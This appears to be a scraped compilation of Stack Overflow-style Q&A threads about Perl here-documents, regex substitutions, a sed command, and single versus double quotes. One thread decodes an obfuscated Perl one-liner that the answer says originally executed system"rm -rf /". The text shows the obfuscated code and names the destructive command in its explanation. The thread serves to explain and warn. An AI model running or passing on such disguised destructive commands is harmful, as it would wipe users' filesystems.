What does ENDOFTEXT mean in this Perl code? - perl

I'd like to know what ENDOFTEXT means in this Perl script:
print <<ENDOFTEXT;
HTTP/1.0 200 OK
Content-Type: text/html
<HTML>
<HEAD><TITLE>Hello World!</TITLE></HEAD>
<BODY>
<H4>Hello World!</H4>
<P>You have reached $url</P>
<P>Your IP Address is $ip</P>
<H5>Have a nice day!</H5>
</BODY>
</HTML>
ENDOFTEXT
exit(0);

It is an operator, called a heredoc or here-document. Amusingly enough the reference in perldoc is not as easy to find as it should be. It is useful for quoting a large section of text without having to bother with escaping quote characters.
You can read the Here document article on wikipedia as well. The entry you are looking for is <<EOF under Quote-and-Quote-like-Operators from perldoc. I'm citing it here for ease of use:
A line-oriented form of quoting is based on the shell "here-document" syntax. Following a << you specify a string to terminate the quoted material, and all lines following the current line down to the terminating string are the value of the item. The terminating string may be either an identifier (a word), or some quoted text. An unquoted identifier works like double quotes. There may not be a space between the << and the identifier, unless the identifier is explicitly quoted. (If you put a space it will be treated as a null identifier, which is valid, and matches the first empty line.)
The terminating string must appear by itself (unquoted and with no surrounding whitespace) on the terminating line.
If the terminating string is quoted, the type of quotes used determine the treatment of the text.

It's a here-document or heredoc. The ENDOFTEXT is just some arbitrary sequence that marks the end of it; it doesn't mean anything in itself. (I would be more inclined to use END but that's just personal taste.)

In addition to what other people said, I should note that the book Perl Best Practices recommends avoiding bareword here-docs (e.g. "<<EOF") and instead explicitly quoting every here-doc as either <<'EOF' or <<"EOF". This is because people often don't know how a bareword EOF is treated (it behaves like double quotes).
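A minimal sketch of the difference between the two explicitly quoted forms. The value of $url is a made-up placeholder for illustration, not something from the original script:

```perl
use strict;
use warnings;

my $url = 'http://example.com/';   # hypothetical value, for illustration only

# Double-quoted terminator: variables and escapes are interpolated.
my $interpolated = <<"END";
You have reached $url
END

# Single-quoted terminator: the text is taken literally.
my $literal = <<'END';
You have reached $url
END

print $interpolated;   # You have reached http://example.com/
print $literal;        # You have reached $url
```

A bareword <<END would behave like the first form here.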

The ENDOFTEXT string signifies the beginning and end of a "here-document". It is described in the official Perl documentation (search for EOF): Quote-and-Quote-like-Operators. It is an arbitrary string; the code could have used the string FOO with the same effect. It allows multi-line quoting, and in this case, variables will be interpolated.

Related

Not able to understand a command in perl

I need help to understand what below command is doing exactly
$abc{hier} =~ s#/tools.*/dfII/?.*##g;
and $abc{hier} contains a path "/home/test1/test2/test3"
Can someone please let me know what the above command is doing exactly. Thanks
s/PATTERN/REPLACEMENT/ is Perl's substitution operator. It searches a string for text that matches the regex PATTERN and replaces it with REPLACEMENT.
By default, the substitution operator works on $_. To tell it to work on a different variable, you use the binding operator - =~.
The default delimiter used by the substitution operator is a slash (/) but you can change that to any other character. This is useful if your PATTERN or your REPLACEMENT contains a slash. In this case, the programmer has used # as the delimiter.
To recap:
$abc{hier} =~ s#PATTERN#REPLACEMENT#;
means "look for text in $abc{hier} that matches PATTERN and replace it with REPLACEMENT".
The substitution operator also has various options that change its behaviour. They are added by putting letters after the final delimiter. In this case we have a g. That means "make the substitution global" - or match and change all occurrences of PATTERN.
In your case, the REPLACEMENT string is empty (we have two # characters next to each other). So we're replacing the PATTERN with nothing - effectively deleting whatever matches PATTERN.
So now we have:
$abc{hier} =~ s#PATTERN##g;
And we know it means, "in the variable $abc{hier}, look for any string that matches PATTERN and replace it with nothing".
The last thing to look at is the PATTERN (or regular expression - "regex"). You can get the full definition of regexes in perldoc perlre. But to explain what we're using here:
/tools : is the fixed string "/tools"
.* : is zero or more of any character
/dfII : is the fixed string "/dfII"
/? : is an optional slash character
.* : is (again) zero or more of any character
So, basically, we're removing bits of a file path from a value that's stored in a hash.
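To see the effect, here is a small sketch that runs the same substitution on two values. The first path is invented for illustration (the question does not show one that matches); the second is the path from the question, which contains neither /tools nor /dfII and is therefore left alone:

```perl
use strict;
use warnings;

# Hypothetical path that contains both /tools and /dfII.
my %abc = (hier => '/opt/cad/tools.1/dfII/bin/virtuoso');
$abc{hier} =~ s#/tools.*/dfII/?.*##g;
print "$abc{hier}\n";    # /opt/cad

# The path given in the question: nothing matches, so nothing changes.
my $unchanged = '/home/test1/test2/test3';
$unchanged =~ s#/tools.*/dfII/?.*##g;
print "$unchanged\n";    # /home/test1/test2/test3
```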
This =~ means "Do a regex operation on that variable."
(Actually, as ikegami correctly reminds me, it is not necessarily only regex operations, because it could also be a transliteration.)
The operation in question is s#something#else#, which means replace the "something" with something "else".
The g at the end means "Do it for all occurrences of something."
Since the "else" is empty, the replacement has the effect of deleting.
The "something" is a definition according to regex syntax, roughly it means "Starting with '/tools' and later containing '/dfII', followed pretty much by anything until the end."
Note that the regex ends with /?.*. In detail, this means "a slash (/), or maybe not (?), and then absolutely anything (.) any number of times, including 0 times (*)". Strictly speaking, it is not necessary to specify "slash or not" when it is followed by "anything, any number of times", because "anything" includes a slash and "any number of times" includes zero or one. I.e. the /? could be omitted without changing the behaviour.
(Thanks ikegami for confirming.)
$abc{hier} =~ s#/tools.*/dfII/?.*##g;
The above command uses a regular expression to strip everything from /tools.*/dfII (with or without a trailing slash and further text) to the end of the value of the hier member of the %abc hash.
It is pretty basic Perl, apart from the non-standard regular expression delimiters (# instead of the standard /). They avoid having to escape / inside the regular expression (s/\/tools.*\/dfII\/?.*//g).
My personal preferred style-guide would make it s{/tools.*/dfII/?.*}{}g .
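As a quick check of the claims above, this sketch applies the #, / and {} spellings, plus a variant without the /?, to one invented path (the path is an assumption for illustration) and prints the four results side by side:

```perl
use strict;
use warnings;

my $path = '/opt/cad/tools/dfII/bin';   # hypothetical path for illustration

(my $hash_delims  = $path) =~ s#/tools.*/dfII/?.*##g;
(my $slash_delims = $path) =~ s/\/tools.*\/dfII\/?.*//g;
(my $brace_delims = $path) =~ s{/tools.*/dfII/?.*}{}g;
(my $no_optional  = $path) =~ s{/tools.*/dfII.*}{}g;   # without the /?

# All four should print the same remaining prefix.
print join(',', $hash_delims, $slash_delims, $brace_delims, $no_optional), "\n";
```

The choice of delimiter is purely a readability decision; the regex itself is identical in each case.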

What does the following sed statement mean

sed 's/<img src=\"\([^"]*\).*/\1/g'
input:
<img src="geo.yahoo.com/b?s=792600534"; height="1" width="1" style="position: absolute;" />
output:
https://geo.yahoo.com/b?s=792600534
This part is the regular expression to match, with a capturing group later referred to as \1 (the first capturing group). It extracts the value of the src attribute.
First part of the regex -> <img src=\"
capturing group -> \([^"]*\)
rest of the regex -> .*
The expression inside the square brackets could be read as: "anything not a double quote".
sed is a scripting language. Its s command performs substitutions using regular expressions. The syntax is s/regex/replacement/flags. In your example, you have the regex
<img src=\"\([^"]*\).*
and the replacement
\1
and the flags
g
The regex is apparently attempting to parse HTML, which deserves you a place in a warm location where a friendly gentleman with a pitchfork helps you with motivational issues. Far, far away, God reluctantly ends the life of a fluffy kitten.
The regular expression contains a capturing group, which is simply the text which matched between the parentheses. The replacement \1 refers back to this captured text. So in brief, you are taking away the parts which matched around this captured string.
s/foo\(bar\)baz/\1/
replaces foobarbaz with just bar, retrieving the "bar" part from whatever matched, rather than hard-coding a replacement string.
The regular expression .* matches any character any number of times; the regular expression engine will prefer the longest, leftmost possible match.
The regular expression [^"] matches a single character which is not (newline or) " and the * again says to match as many times as possible. So "\([^"]*\)" finds a double-quoted string, and captures its contents; the negated " prevents the regular expression from matching past the closing quote when matching as many characters as possible. (As noted in comments, the backslash before the first " is unnecessary, but basically harmless. It just tells us that whoever wrote this isn't a regex wizard.)
However, your example just implicitly includes the closing quote in the .* match which will simply match everything from the closing quote through to the end of the line.
The g flag says to repeat the substitution command as many times as possible; so if an input line contains multiple matches, all of them will be replaced. (Without the g flag, sed will just replace the first match it finds on a line.) But since you just removed the rest of the line, the flag isn't actually useful here; there can only ever be a single match.
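For readers following the rest of this page in Perl, here is a rough Perl rendition of the same substitution, offered as a sketch rather than a drop-in replacement for the sed command. Note the syntax differences: Perl groups with plain ( ) and refers to the capture as $1, where sed's basic regex syntax uses \( \) and \1. The input line is the one from the question:

```perl
use strict;
use warnings;

# Sample line taken from the question.
my $line = '<img src="geo.yahoo.com/b?s=792600534"; height="1" width="1" style="position: absolute;" />';

# Keep only what the capturing group matched; the trailing .* swallows
# the closing quote and the rest of the line.
(my $src = $line) =~ s/<img src="([^"]*).*/$1/;
print "$src\n";    # geo.yahoo.com/b?s=792600534

# The smaller example from above: the capture is "bar".
(my $demo = 'foobarbaz') =~ s/foo(bar)baz/$1/;
print "$demo\n";   # bar
```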
The gentleman with the pitchfork doesn't want me to tell you this, but this code is not suitable for a general-purpose script. There is no guarantee that the src attribute of the img element will be immediately adjacent to the img opening tag with just a single space in between; HTML allows arbitrary spacing (including a line wrap) and you can have other attributes like id or alt or title which could go before or after the src attribute. The proper solution is to use a HTML parser to extract the src attributes of img tags with proper understanding of the surrounding syntax.
xmlstarlet sel -T -t -m "/img" -m "@src" -v '.' -n
... though the stray semicolon after the src attribute is a HTML syntax violation; is it really there in your input?
(xmlstarlet command line shamelessly adapted from https://stackoverflow.com/a/3174307/874188)

Perl specific code

The following program is in Perl.
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-#[-`{-};`-{/" -;;s;;$_;see'
Can somebody help me to understand how it works?
This bit of code's already been asked about on the Debian forums.
According to Lacek, the moderator on that thread, what the code originally did is rm -rf /, though they mention they've changed the version there so that people trying to figure out how it works don't delete their entire filesystem. There's also an explanation there of what the various parts of the Perl code do.
(Did you post this knowing what it did, or were you unaware of it?)
To quote Lacek's post on it:
Anyway, here is how the script works.
It is basically two regex substitutions and one transliteration.
Piping anything into its standard input makes no difference, the perl
code doesn't use its input in any way. If you split the long line on
the boundaries of the expressions, you get this:
$??s:;s:s;;$?::
s;;=]=>%-{\\>%<-{;;
y; -/:-@[-`{-};`-{/" -;;
s;;$_;see
The first line is a condition which does nothing save makes the code look more difficult. If the previous command originated from the perl code wasn't successful, it does some substitutions on the standard input (which the program doesn't use, so effectively it substitutes the nothing). Since no previous command exists, $? is always 0, so the first line never gets executed.
The second line substitutes the standard input (the nothing) for seemingly meaningless garbage.
The third line is a transliteration operator. It defines 4 ranges, in which the characters gets substituted to the one range and the 4 characters given in the transliteration replacement. I'd prefer not to write the whole transliteration table here, because it's a bit long. If you are really interested, just write the characters in the defined ranges (space to '/', ':' to '@', '[' to '(backtick)', and '{' to '}'), and write next to them the characters from the replacement range ('(backtick)' to '{'), and finally, write the remaining characters (/,", space and -) from the replacement pattern. When you have this table, you can see what character gets replaced to what.
The last line executes the resulting command by substituting the nothing with the resulted string (which is 'xterm'. Originally it was 'system"rm -rf /"', and is held in $_), evaluates the substitution as an expression and executes it.
(I've substituted 'backtick' for the actual backtick character here so that the code auto-formatting doesn't kick in.)
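The two building blocks described in the quote can be tried safely in isolation. The sketch below uses made-up, harmless inputs (none of it comes from the obfuscated one-liner) to show a range-based transliteration and a substitution with the ee modifier:

```perl
use strict;
use warnings;

# y/// (also spelled tr///) maps each character in the left-hand range
# to the character at the same position in the right-hand range.
(my $shifted = 'hal') =~ y/a-y/b-z/;
print "$shifted\n";    # ibm

# With /ee the replacement is first evaluated as an expression, and the
# resulting string is then evaluated again as Perl code.
my $code   = 'join "-", 1 .. 3';   # harmless stand-in for the hidden command
my $result = '';
$result =~ s/^/$code/ee;           # ^ is used here instead of an empty pattern
print "$result\n";     # 1-2-3
```

This is why the final s;;$_;see in the one-liner ends up running whatever string the earlier steps left in $_.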

What's the difference between single and double quotes in Perl?

I am just beginning to learn Perl. I looked at the beginning perl page and started working.
It says:
The difference between single quotes and double quotes is that single quotes mean that their contents should be taken literally, while double quotes mean that their contents should be interpreted
When I run this program:
#!/usr/local/bin/perl
print "This string \n shows up on two lines.";
print 'This string \n shows up on only one.';
It outputs:
This string
shows up on two lines.
This string
shows up on only one.
Am I wrong somewhere?
the version of perl below:
perl -v
This is perl, v5.8.5 built for aix
Copyright 1987-2004, Larry Wall
Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using `man perl' or `perldoc perl'. If you have access to the
Internet, point your browser at http://www.perl.com/, the Perl Home Page.
I am inclined to say something is up with your shell/terminal, and whatever you are outputting to is interpreting the \n as a newline and that the problem is not with Perl.
To confirm: This Shouldn't Happen(TM) - in the first case I would expect to see a new line inserted, but with single quotes it ought to output literally the characters \n and not a new line.
In Perl, single-quoted strings do not expand backslash-escapes like \n or \t. The reason you're seeing them expanded is probably due to the nature of the shell that you're using, which is munging your output for some reason.
Everything you need to know about quoting and quote-like operators is in perlop.
To answer your specific question, double-quotes can turn certain sequences of literal characters into other characters. In your example, the double quotes turn the sequence of characters \ and n into the single character that represents a newline. In a single quoted string, that same literal sequence is just the literal \ and n characters.
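One way to check this without relying on how a terminal displays the output is to compare string lengths. A minimal sketch, with variable names chosen only for illustration:

```perl
use strict;
use warnings;

my $double = "a\nb";    # \n becomes one newline character
my $single = 'a\nb';    # backslash and n stay as two characters

print length($double), "\n";   # 3
print length($single), "\n";   # 4

# Inside single quotes only \\ and \' are treated specially.
my $escaped = 'a\\nb';  # \\ collapses to one backslash
print $escaped eq $single ? "same\n" : "different\n";   # same
```

If the lengths come out as 3 and 4, Perl is behaving as documented and any extra line break is being introduced after the output leaves Perl.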
By "interpreted", they mean that variable names and such will not be printed, but their values instead. \n is an escape sequence, so I'd think it would not be interpreted.
In addition to your O'Reilly link, a reference no less authoritative than the 'Programming Perl' book by Larry Wall, states that backslash interpolation does not occur in single quoted strings.
... much like Unix shell quotes: double quoted string literals are subject to
backslash and variable interpolation; single quoted strings are not
(except for \' and \\, so that you may ...)
Programming Perl, 2nd ed, 1996 page 16
So it would be interesting to see what your Perl does with
print 'Double backslash n: \\n';
As above, please show us the output from 'perl -v'.
And I believe I have confused the forum editor software, because that last Perl 'print' should have been indented.
If you use double quotes, the \n will be interpreted as a newline.
But if you use single quotes, the \n will not be interpreted as a newline.
For me it is working correctly.
file content
print "This string \n shows up on two lines.";
print 'This string \n shows up on only one.'

How can I prevent Perl from interpreting \ as an escape character?

How can I print an address string without making Perl take the slashes as escape characters? I also don't want to alter the string by adding more escape characters.
What you're asking about is called interpolation. See the documentation for "Quote-Like Operators" at perldoc perlop, but more specifically the way to do it is with the syntax called the "here-document" combined with single quotes:
Single quotes indicate the text is to be treated literally with no interpolation of its content. This is similar to single quoted strings except that backslashes have no special meaning, with \\ being treated as two backslashes and not one as they would in every other quoting construct.
This is the only form of quoting in perl where there is no need to worry about escaping content, something that code generators can and do make good use of.
For example:
my $address = <<'EOF';
blah#blah.blah.com\with\backslashes\all\over\theplace
EOF
You may want to read up on the various other quoting operators such as qw and qq (at the same document as I referenced above), as they are very commonly used and make good shorthand for other more long-winded ways of escaping content.
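The difference between a single-quoted here-document and an ordinary single-quoted string shows up only with a doubled backslash. A small sketch, using an invented path as sample text:

```perl
use strict;
use warnings;

# Hypothetical sample text containing single and doubled backslashes.
my $heredoc = <<'EOF';
C:\temp\new\\share
EOF
chomp $heredoc;   # drop the newline that ends the here-document line

my $quoted = 'C:\temp\new\\share';   # here \\ collapses to a single backslash

print length($heredoc), "\n";   # 18: both backslashes are kept
print length($quoted), "\n";    # 17: one backslash was consumed
```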
Use single quotes. For example
print 'lots\of\backslashes', "\n";
gives
lots\of\backslashes
If you want to interpolate variables, use the . operator, as in
$var = "pesky";
print 'lots\of\\' . $var . '\backslashes', "\n";
Notice that you have to escape the backslash at the end of the string.
As an alternative, you could use join:
print join("\\" => "lots", "of", $var, "backslashes"), "\n";
We could give much more helpful answers if you'd give us sample code.
It depends what you're escaping, but the Quote-like operators may help.
See the perlop man page.
Use the backslash twice:
print "This is a backslash character \\";